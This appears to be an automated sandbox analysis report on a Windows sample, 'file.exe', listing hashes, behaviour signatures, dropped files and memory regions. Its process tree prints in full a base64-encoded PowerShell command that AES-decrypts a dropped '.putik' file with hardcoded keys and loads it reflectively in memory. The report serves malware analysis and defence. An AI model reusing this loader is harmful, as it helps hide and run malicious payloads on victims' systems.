Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    18/05/2024, 18:33

General

  • Target

    file.exe

  • Size

    1.0MB

  • MD5

    dc8a137a9917260473120aa235f69f5f

  • SHA1

    dd74caccc6c2ab38da7f4171d1a64ae506f185b8

  • SHA256

    e47140a389037bf3c66528b2a762dd359b3d2da361f324819b18ca595d2f178e

  • SHA512

    de49ba1a489a488fa15262869f49944a3a46f1d2b2a1fc1e55b7e9914b92d892b5e22bc0230a7e8b7dd072f11753d7d683c4d49cb993d85eff23a92acdc61c19

  • SSDEEP

    12288:MUfbdTxwbed/QIA8EmCCZPyXNDxaMejIQv7iglCqRoeuIIymiR8gZMRnObwZNtV:MUfhTFQBeCHND/j87j8oIhiR8gv69

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEYANQAsACAAMAB4ADYANQAsACAAMAB4AEIAMgAsACAAMAB4ADEANwAsACAAMAB4ADIAOQAsACAAMAB4ADkAMwAsACAAMAB4ADEAQQAsACAAMAB4AEIAMgAsACAAMAB4ADkAQQAsACAAMAB4ADIAQgAsACAAMAB4ADYANAAsACAAMAB4AEQAQQAsACAAMAB4ADAAOQAsACAAMAB4ADQANwAsACAAMAB4ADQARAAsACAAMAB4AEMANAAsACAAMAB4ADIARQAsACAAMAB4ADUANQAsACAAMAB4ADgANQAsACAAMAB4ADgARQAsACAAMAB4AEMAQQAsACAAMAB4AEMANgAsACAAMAB4AEIAMAAsACAAMAB4AEYAMgAsACAAMAB4AEIAOAAsACAAMAB4ADcAOQAsACAAMAB4ADgARgAsACAAMAB4ADEAMQAsACAAMAB4ADAAMgAsACAAMAB4AEQAOQAsACAAMAB4ADAAMwAsACAAMAB4ADIARQApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEQALAAgADAAeABEAEEALAAgADAAeAAwADcALAAgADAAeABCAEMALAAgADAAeABBAEYALAAgADAAeAA2AEQALAAgADAAeAAyADIALAAgADAAeAA3ADMALAAgADAAeAA4ADMALAAgADAAeABDADYALAAgADAAeABFAEMALAAgADAAeABCAEEALAAgADAAeAA0AEUALAAgADAAeAA0AEEALAAgADAAeAA0ADkALAAgADAAeABCADMAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2148

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\file-2963.putik

          Filesize

          33KB

          MD5

          3c14b9bc33ce5f0b10b4275a6eaa8357

          SHA1

          32aaab855271823146dd5ae040869b7d3396fe52

          SHA256

          a43e0362fee162598f177bc18013b4cd3861ac166ad1af06b460663a55a2cb35

          SHA512

          f9f9d6f7d2717e49d892e69b67f9ff211ac1d4bee5182297bf39d0a064841a86b15423ac31e6528c2b629354cff5d7dd55739ba1c869b3a60d771da1834377a1

        • memory/2148-5-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

          Filesize

          4KB

        • memory/2148-7-0x000000001B670000-0x000000001B952000-memory.dmp

          Filesize

          2.9MB

        • memory/2148-6-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

          Filesize

          9.6MB

        • memory/2148-8-0x0000000001F00000-0x0000000001F08000-memory.dmp

          Filesize

          32KB

        • memory/2148-10-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

          Filesize

          9.6MB

        • memory/2148-9-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

          Filesize

          9.6MB

        • memory/2148-11-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

          Filesize

          9.6MB

        • memory/2148-12-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

          Filesize

          9.6MB

        • memory/2148-14-0x0000000002B10000-0x0000000002B1C000-memory.dmp

          Filesize

          48KB

        • memory/2148-15-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

          Filesize

          9.6MB